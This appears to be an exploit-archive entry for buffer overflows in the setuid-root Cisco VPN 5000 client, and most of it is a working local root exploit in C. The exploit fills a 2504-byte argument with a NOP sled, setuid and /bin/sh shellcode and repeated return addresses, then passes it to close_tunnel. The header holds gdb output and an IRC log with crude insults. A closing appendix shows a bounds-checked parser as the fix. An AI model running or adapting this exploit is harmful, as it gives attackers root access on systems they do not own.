// source: https://www.securityfocus.com/bid/5734/info
Buffer overrun vulnerabilities have been reported in the Cisco VPN 5000 UNIX clients available for Linux and Solaris systems. The condition affects the binaries 'close_tunnel' and 'open_tunnel', both installed setuid root by default. Malicious local users may exploit these vulnerabilities to gain superuser privileges on the affected host.
/*
* [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
* (C) BrainStorm - 2002
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb) i r
* eax 0xffffffff -1
* ecx 0x0 0
* edx 0x0 0
* ebx 0x4015c154 1075167572
* esp 0xbfffdb70 0xbfffdb70
* ebp 0x41414141 0x41414141
* esi 0x400168e4 1073834212
* edi 0xbfffdbf4 -1073751052
* eip 0x41414141 0x41414141
* eflags 0x10286 66182
*
* as you can see %eip got filled with 0x41 ;)
*
* tested:
* - on release 5.1.5
* - from package: vpn-5000-linux-5.1.5-des-k8.tar.Z
* - system RedHat Linux 7.2 / x86
*
* Bug Information:
* There are multiple unchecked buffers in the code which allow
* arbitrary code to be executed with root privileges.
* This is due to insufficient bounds checking.
* The result is a classic command line buffer overflow condition.
* This should be exploitable on Linux/Solaris.
*
* IRC:
* <BrainStor> a standard cmd line buffer overflow in the -d option
* <BrainStor> close_tunnel is set +s by default
* <v0id> tsk tsk tsk, cisco making errors like that
* <v0id> fucking stupid cunts
* <BrainStor> yea
* <BrainStor> it's unbelievable
* <v0id> man, standard buffer overflow should be practically non existent these days
* <v0id> oh well
* <BrainStor> indeed
* <BrainStor> but its good tho ;)
*/
#include <stdio.h>
#include <stdlib.h>   /* atoi() */
#include <string.h>   /* strlen(), memcpy() */
#include <unistd.h>   /* execl() */

#define B 2504                 /* size of the overflow buffer */
#define N 0x90                 /* NOP, used for the sled */
#define R 0xbfffefc0           // may need to be changed depending on the distro/os..
#define BIN "/bin/close_tunnel" // you may want to change this too =P
                                // /usr/local/bin/close_tunnel or so..

char shell[] = "HELO" // yes this is a valid x86 instruction ;)
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid();
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(int argc, char **argv)
{
    int ret, off, es;
    char bof[B];

    printf("\n\n");
    printf(" [ElectronicSouls] \n");
    printf(" Cisco VPN 5000 client exploit \n");
    printf(" (C) BrainStorm \n\n");

    /* optional arguments: <offset> <return address> (both decimal, via atoi) */
    if (argv[1] == NULL) {
        off = 0;
        ret = R;
    } else {
        off = atoi(argv[1]);
        ret = atoi(argv[2]) + off;
    }

    /* fill the whole buffer with the return address */
    for (es = 0; es < B; es += 4)
        *(long *) &bof[es] = ret;
    printf("+ return address: 0x%x \n", ret);

    /* NOP sled followed by the shellcode; the tail keeps the return addresses */
    for (es = 0; es < (B - strlen(shell) - 36); ++es)
        *(bof + es) = N;
    memcpy(bof + es, shell, strlen(shell));

    printf("+ overflowing the buffer..\n\n\n");
    execl(BIN, BIN, "-d", bof, (char *)NULL); // b00m!
    return 0;
}
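The defect class described above is an unchecked copy of a command-line option value into a fixed-size buffer in a setuid root program. The following is an added example, not Cisco's code and not part of the original post, showing how a `-d <name>` value should be accepted only when it fits the destination; `DEVICE_NAME_MAX`, `copy_option_checked` and `parse_tunnel_args` are constructed names.

```c
/* Added example: bounded handling of a "-d <name>" option value.
 * Not Cisco's code; DEVICE_NAME_MAX and the function names are constructed.
 * The page's bug is the opposite pattern: an unchecked copy of argv[]
 * into a fixed stack buffer in a setuid root binary. */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define DEVICE_NAME_MAX 64   /* constructed limit, trailing NUL included */

/* Copy src into dst only if it fits, NUL included. Returns 0 or -1.
 * argv[] is attacker-controlled in a setuid program, so the length is
 * checked before a single byte is written. */
static int copy_option_checked(char *dst, size_t dst_len, const char *src)
{
    size_t n = strlen(src);
    if (n == 0 || n >= dst_len) {
        errno = (n == 0) ? EINVAL : ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Scan argv for "-d <name>" and store the value in name.
 * Returns 0 on success, -1 if the option is absent, has no value,
 * or the value does not fit. */
int parse_tunnel_args(int argc, char **argv, char *name, size_t name_len)
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-d") == 0) {
            if (i + 1 >= argc)
                return -1;                 /* "-d" with no value */
            return copy_option_checked(name, name_len, argv[i + 1]);
        }
    }
    return -1;                             /* no "-d" given */
}

int main(int argc, char **argv)
{
    char name[DEVICE_NAME_MAX];
    if (parse_tunnel_args(argc, argv, name, sizeof name) != 0) {
        fprintf(stderr, "usage: %s -d <name> (at most %d characters)\n",
                argv[0], DEVICE_NAME_MAX - 1);
        return 1;
    }
    printf("device: %s\n", name);
    return 0;
}
```

An oversized value, such as the 2504-byte argument built by the exploit above, is rejected before the copy instead of overwriting the saved return address.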